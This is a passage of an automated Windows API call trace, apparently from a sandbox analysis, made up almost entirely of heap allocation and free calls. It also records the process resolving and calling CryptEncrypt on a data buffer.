hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0186.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0186.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0186.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0186.957] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0186.957] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0186.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0186.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0186.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0186.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0186.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0186.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0186.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0186.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0186.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0186.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0186.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0186.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0186.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0186.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0186.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0186.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0186.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0186.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0186.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0186.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0186.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0186.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0186.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0186.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0186.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0186.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0186.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0186.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0186.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0186.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0186.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0186.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0186.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0186.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0186.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0186.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0186.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0186.960] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0186.960] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50ba8 [0186.961] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50ba8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0186.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0186.961] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0186.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0186.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54288 [0186.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0186.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0186.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0186.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0186.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0186.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0186.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0186.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0186.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0186.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0186.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0186.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0186.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0186.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0186.962] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0186.962] CryptEncrypt (in: hKey=0xa87290, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3bf3978*, pdwDataLen=0x8cef60*=0x13925, dwBufLen=0x13928 | out: pbData=0x3bf3978*, pdwDataLen=0x8cef60*=0x13928) returned 1 [0186.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0186.965] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0187.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0187.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0187.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0187.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0187.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0187.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0187.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0187.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0187.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0187.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0187.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0187.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0187.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0187.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0187.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0187.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0187.003] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0187.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0187.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0187.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0187.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0187.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0187.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0187.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0187.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0187.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0187.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0187.004] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0187.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977db8 [0187.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0187.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0187.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0187.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0187.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0187.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0187.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0187.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0187.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0187.005] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0187.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0187.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0187.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0187.007] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0187.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0187.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0187.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0187.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.007] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0187.008] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0187.008] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: 